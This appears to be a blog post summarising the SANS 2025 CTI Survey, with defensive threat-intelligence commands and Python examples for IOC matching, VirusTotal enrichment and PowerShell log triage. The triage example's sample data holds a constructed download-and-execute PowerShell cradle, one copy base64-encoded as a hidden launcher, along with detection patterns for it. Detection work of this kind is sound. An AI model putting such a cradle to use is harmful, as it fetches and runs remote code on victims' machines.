The SANS Institute has released its annual survey report, “SANS 2025 CTI Survey: Navigating Uncertainty in Today’s Threat Landscape”, available for download here. This report provides critical insights into the current state of Cyber Threat Intelligence (CTI) practices across organizations.
Key Findings:
- 93% of organizations maintain some form of in-house CTI capability.
- Intelligence requirements are the most formalized (44%), followed by collection planning (41%) and threat modeling (37%).
- Threat landscape reports are the primary deliverable for CTI teams.
- Direct feedback through meetings is the primary measure of CTI effectiveness, indicating a need for more quantifiable metrics.
- AI adoption is growing, with collection being the leading phase where AI is applied.
You Should Know:
Essential CTI Tools & Commands
To implement effective CTI, security teams rely on various tools and frameworks. Below are key commands and techniques:
1. Threat Intelligence Collection
- MISP (Malware Information Sharing Platform)
MISP is not shipped as a Debian/Ubuntu apt package, so `apt-get install misp-core` does not work; install it with the project's official install scripts or the misp-docker images instead. On a script-based install the background job workers run as a systemd unit that must be started for feeds and correlation to be processed:

```bash
sudo systemctl start misp-workers
sudo systemctl status misp-workers   # confirm the workers are actually running
```
- OpenCTI (Threat Intelligence Platform)
Run from a checkout of the OpenCTI docker repository after filling in the `.env` file (admin credentials, tokens, ports):

```bash
docker-compose -f docker-compose.yml up -d
```
2. Automating Threat Feeds
- Fetching Threat Feeds with Python
```python
import os
import requests

# Pull the pulses this account subscribes to on AlienVault OTX. The key is
# read from the environment instead of being hard-coded in the script.
feed_url = "https://otx.alienvault.com/api/v1/pulses/subscribed"
headers = {"X-OTX-API-KEY": os.environ["OTX_API_KEY"]}

response = requests.get(feed_url, headers=headers, timeout=30)
response.raise_for_status()          # fail loudly on 401/403/429 instead of printing an error body
print(response.json())
```
3. Analyzing IOCs (Indicators of Compromise)
- YARA Rule Scanning
Scan a directory tree recursively (`-r`) against a rule file:

```bash
yara -r rules.yar /malware/samples
```
- Sigma for SIEM Detection
Convert a Sigma rule into a Splunk search with sigma-cli. Add a processing pipeline (for example `-p splunk_windows`) so that generic field names in the rule are mapped onto the field names your Sysmon/Windows logs actually use in Splunk:

```bash
sigma convert -t splunk -p splunk_windows -o output.splunk sigma_rule.yml
```
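Sections 2 and 3 describe fetching a feed and then matching indicators against local data. The following added example (written for this page, not code from SANS, OTX or Undercode) ties the two together offline: it normalises a constructed OTX-style pulse response into a lookup table and runs it over constructed proxy log lines. The pulse names, indicators, log lines and the key=value log format are all assumptions made for the example; the filtering of RFC 1918 and loopback addresses is the kind of hygiene a feed parser needs, because public feeds do occasionally contain such addresses.

```python
import ipaddress
import json
import re

# Constructed sample in the shape of an OTX /pulses/subscribed response,
# trimmed to the fields used here. It is not real feed data.
SAMPLE_PULSES = json.loads("""
{
  "results": [
    {"name": "Phishing kit infra (constructed)",
     "indicators": [
       {"indicator": "198.51.100.23", "type": "IPv4"},
       {"indicator": "Login-Update.example.", "type": "domain"},
       {"indicator": "hxxp://login-update.example/auth", "type": "URL"},
       {"indicator": "D41D8CD98F00B204E9800998ECF8427E", "type": "FileHash-MD5"}
     ]},
    {"name": "Loader C2 (constructed)",
     "indicators": [
       {"indicator": "198.51.100.23", "type": "IPv4"},
       {"indicator": "cdn.example.net", "type": "hostname"},
       {"indicator": "10.0.0.5", "type": "IPv4"},
       {"indicator": "not an ip", "type": "IPv4"}
     ]}
  ]
}
""")

# Collapse OTX indicator types onto the four kinds the matcher understands.
TYPE_MAP = {"IPv4": "ip", "IPv6": "ip", "domain": "domain", "hostname": "domain",
            "URL": "url", "FileHash-MD5": "hash", "FileHash-SHA1": "hash",
            "FileHash-SHA256": "hash"}

# Ranges that must never be acted on from a public feed. ipaddress.is_global is
# not used because it also excludes the documentation ranges (198.51.100.0/24
# and friends) that this constructed sample relies on.
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "::1/128", "fc00::/7", "fe80::/10")]


def normalize(kind, raw):
    """Canonicalise one indicator, or return None if it should be discarded."""
    value = raw.strip()
    if kind == "ip":
        addr = ipaddress.ip_address(value)            # raises ValueError on junk
        return None if any(addr in net for net in LOCAL_NETS) else str(addr)
    if kind == "domain":
        return value.lower().rstrip(".")             # case-insensitive, drop root dot
    if kind == "url":
        value = re.sub(r"^hxxp(s?)://", r"http\1://", value, flags=re.I)  # refang
        return value.lower()
    if kind == "hash":
        return value.lower()
    return None


def extract_iocs(pulses):
    """Return {kind: {value: set(pulse names)}} so every later hit keeps its source."""
    iocs = {}
    for pulse in pulses.get("results", []):
        for ind in pulse.get("indicators", []):
            kind = TYPE_MAP.get(ind.get("type"))
            if kind is None:
                continue
            try:
                value = normalize(kind, ind["indicator"])
            except ValueError:
                value = None                           # malformed entry: skip, do not crash
            if value is not None:
                iocs.setdefault(kind, {}).setdefault(value, set()).add(pulse["name"])
    return iocs


# Constructed key=value proxy log lines; not from a real system.
SAMPLE_LOGS = [
    "2025-05-01T10:00:01Z src=10.1.2.3 dst=198.51.100.23 host=login-update.example url=http://login-update.example/auth",
    "2025-05-01T10:00:02Z src=10.1.2.4 dst=203.0.113.9 host=intranet.corp.example url=http://intranet.corp.example/",
    "2025-05-01T10:00:03Z src=10.1.2.5 dst=10.0.0.5 host=CDN.example.net url=http://CDN.example.net/x.bin",
]
FIELD_RE = re.compile(r"(\w+)=(\S+)")


def match_logs(lines, iocs):
    """Return (line_no, kind, value, sorted pulse names) for every indicator hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        fields = dict(FIELD_RE.findall(line))
        for kind, field in (("ip", "dst"), ("domain", "host"), ("url", "url")):
            raw = fields.get(field)
            if raw is None:
                continue
            value = raw.lower().rstrip(".") if kind == "domain" else raw.lower()
            sources = iocs.get(kind, {}).get(value)
            if sources:
                hits.append((n, kind, value, sorted(sources)))
    return hits


if __name__ == "__main__":
    for hit in match_logs(SAMPLE_LOGS, extract_iocs(SAMPLE_PULSES)):
        print(hit)
```

Note that the internal address `10.0.0.5` never reaches the lookup table, so the third log line is only flagged on its hostname, and that each hit carries the pulse names it came from, which is what an analyst needs when the alert is reviewed.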
4. Indicator Enrichment with the VirusTotal API
- Using the VirusTotal API
A file-report lookup by hash is an enrichment query, not AI-driven detection: it returns the verdicts of the scanning engines that have already seen the sample, which is useful for prioritising indicators before any hunt.

```bash
curl --request GET --url "https://www.virustotal.com/api/v3/files/{hash}" --header "x-apikey: YOUR_API_KEY"
```
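What the curl call returns still has to be interpreted, and two outcomes are routinely misread: a 404 means the hash has never been submitted (not that the file is clean), and a 429 means the quota is exhausted. The following added example (this page's own illustration, not VirusTotal's code) validates a hash before spending an API call on it and turns a status code plus decoded v3 response body into a verdict. The response bodies are constructed in the shape of the v3 API, and the `threshold` of five malicious engines is an assumed local policy, not a VirusTotal recommendation.

```python
import re

HEX_LENGTHS = {32: "md5", 40: "sha1", 64: "sha256"}


def hash_kind(value):
    """Validate and canonicalise a hash; raises ValueError for anything else."""
    value = value.strip().lower()
    if not re.fullmatch(r"[0-9a-f]+", value) or len(value) not in HEX_LENGTHS:
        raise ValueError(f"not an MD5/SHA-1/SHA-256 hex digest: {value!r}")
    return HEX_LENGTHS[len(value)], value


def classify(status, body, threshold=5):
    """Map an HTTP status and decoded /files/{hash} body to a verdict dict.

    threshold is an assumed local policy for this example, not a VirusTotal value.
    """
    if status == 404:
        return {"verdict": "unknown", "note": "hash never submitted; not evidence of a clean file"}
    if status == 429:
        return {"verdict": "retry", "note": "quota exceeded; back off and retry later"}
    if status != 200:
        code = body.get("error", {}).get("code", "unknown")
        return {"verdict": "error", "note": f"unexpected status {status}: {code}"}
    attrs = body.get("data", {}).get("attributes", {})
    stats = attrs.get("last_analysis_stats", {})
    malicious = stats.get("malicious", 0)
    suspicious = stats.get("suspicious", 0)
    engines = sum(stats.values())
    label = attrs.get("popular_threat_classification", {}).get("suggested_threat_label")
    if malicious >= threshold:
        verdict = "malicious"
    elif malicious + suspicious > 0:
        verdict = "suspicious"
    elif engines == 0:
        verdict = "unknown"            # report exists but no engine has scanned it yet
    else:
        verdict = "likely_clean"
    return {"verdict": verdict, "malicious": malicious, "suspicious": suspicious,
            "engines": engines, "label": label, "name": attrs.get("meaningful_name")}


# Constructed (status, body) pairs in the shape of v3 responses; not real VirusTotal data.
SAMPLE_HIT = (200, {"data": {"type": "file", "id": "a" * 64, "attributes": {
    "meaningful_name": "invoice.exe",
    "last_analysis_stats": {"malicious": 41, "suspicious": 2, "undetected": 25,
                            "harmless": 0, "timeout": 0},
    "popular_threat_classification": {"suggested_threat_label": "trojan.constructed/sample"}}}})
SAMPLE_BENIGN = (200, {"data": {"type": "file", "id": "b" * 64, "attributes": {
    "last_analysis_stats": {"malicious": 0, "suspicious": 0, "undetected": 60,
                            "harmless": 5, "timeout": 0}}}})
SAMPLE_UNSEEN = (404, {"error": {"code": "NotFoundError", "message": "File not found"}})
SAMPLE_QUOTA = (429, {"error": {"code": "QuotaExceededError", "message": "Quota exceeded"}})


if __name__ == "__main__":
    for status, body in (SAMPLE_HIT, SAMPLE_BENIGN, SAMPLE_UNSEEN, SAMPLE_QUOTA):
        print(status, classify(status, body))
```

In a real pipeline `classify` would be fed from `response.status_code` and `response.json()` of the request above; keeping the interpretation separate from the HTTP call is what makes it testable without a key.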
5. Windows Threat Hunting
- PowerShell Log Analysis
Event 4104 is the script block logging record; it only covers the whole session once Script Block Logging is enabled by policy. Filtering server-side with `-FilterHashtable` is much faster than piping every event through `Where-Object`, and the script text is the third property of the event:

```powershell
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104} |
    Select-Object TimeCreated, @{Name='ScriptBlock'; Expression={$_.Properties[2].Value}}
```
- Sysmon for Advanced Monitoring
Install Sysmon with a configuration file from an elevated prompt (use `sysmon64` on 64-bit Windows):

```powershell
sysmon -accepteula -i sysmonconfig-export.xml
```
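Once the 4104 script blocks have been exported, the bulk of them are benign administration and the interesting ones are often hidden behind `-EncodedCommand`. The following added example (written for this page; not code from SANS or Undercode, and the heuristic names are its own, not a vendor taxonomy) triages constructed 4104 records in Python: it decodes the base64/UTF-16LE payload that `-enc` expects, applies a few common heuristics to both the raw and decoded text, and pulls out URLs that can be fed straight back into the indicator matching above. The sample records and their field names follow what `Get-WinEvent` exposes, but are constructed, not real logs.

```python
import base64
import re

# Constructed 4104 records; not real logs. The encoded payload is generated
# here exactly the way `powershell -enc` expects it (UTF-16LE, then base64),
# so the sample is self-consistent.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/a')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"Id": 4104, "ScriptBlockText": "Get-ChildItem C:\\Users | Measure-Object", "Path": "C:\\scripts\\inv.ps1"},
    {"Id": 4104, "ScriptBlockText": f"powershell -nop -w hidden -enc {ENCODED}", "Path": ""},
    {"Id": 4104, "ScriptBlockText": "$c = New-Object Net.WebClient; IEX $c.DownloadString('http://198.51.100.23/a')", "Path": ""},
    {"Id": 4103, "ScriptBlockText": "IEX whatever", "Path": ""},   # pipeline event, not a script block
]

# Heuristics used by this example; the names are its own, not a vendor taxonomy.
SUSPICIOUS = {
    "invoke_expression": re.compile(r"\b(IEX|Invoke-Expression)\b", re.I),
    "download": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden\b", re.I),
}
ENC_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.I)


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload, or None if absent or invalid."""
    m = ENC_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None   # truncated or non-UTF-16 blob: report nothing rather than crash


def triage(events):
    """Return a finding for every 4104 record on which at least one heuristic fires."""
    findings = []
    for ev in events:
        if ev.get("Id") != 4104:
            continue
        text = ev.get("ScriptBlockText", "")
        decoded = decode_encoded_command(text)
        tags = [name for name, rx in SUSPICIOUS.items() if rx.search(text)]
        if decoded is not None:
            tags.append("encoded_command")
            # The raw record only shows the base64 blob; the decoded payload is
            # where the real behaviour (download, IEX) becomes visible.
            tags += [name for name, rx in SUSPICIOUS.items()
                     if rx.search(decoded) and name not in tags]
        if tags:
            findings.append({
                "script": text[:60],
                "decoded": decoded,
                "tags": sorted(tags),
                "urls": sorted(set(URL_RE.findall(decoded or "") + URL_RE.findall(text))),
            })
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The benign `Get-ChildItem` block produces no finding and the 4103 record is ignored, while the encoded launcher is reported with the decoded payload attached, which is what lets the `198.51.100.23` URL be checked against the feed without anyone decoding base64 by hand.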
What Undercode Says
The SANS 2025 CTI Survey highlights the growing importance of structured threat intelligence, yet organizations still struggle with funding and with showing measurable return on the investment. Automation (through scripting and, where it fits, AI) is critical for scaling CTI operations. Teams should focus on integrating threat feeds, automating IOC normalization and matching, and feeding enriched indicators into detection so that they stay ahead of adversaries rather than behind their own backlog.
Prediction
By 2026, AI-driven threat intelligence will dominate CTI workflows, reducing reliance on manual analysis and improving real-time threat response.
Expected Output:
- Threat intelligence stored, correlated and shared through a platform (MISP, OpenCTI)
- Automated IOC detection (YARA for files and memory, Sigma rules converted for the SIEM)
- Enriched indicators and hunting pivots (VirusTotal lookups, Splunk searches)
- Windows endpoint telemetry and forensic commands (Sysmon, PowerShell event logs, YARA)
For the full report, download it from SANS Institute.
References:
Reported By: Mthomasson The – Hackers Feeds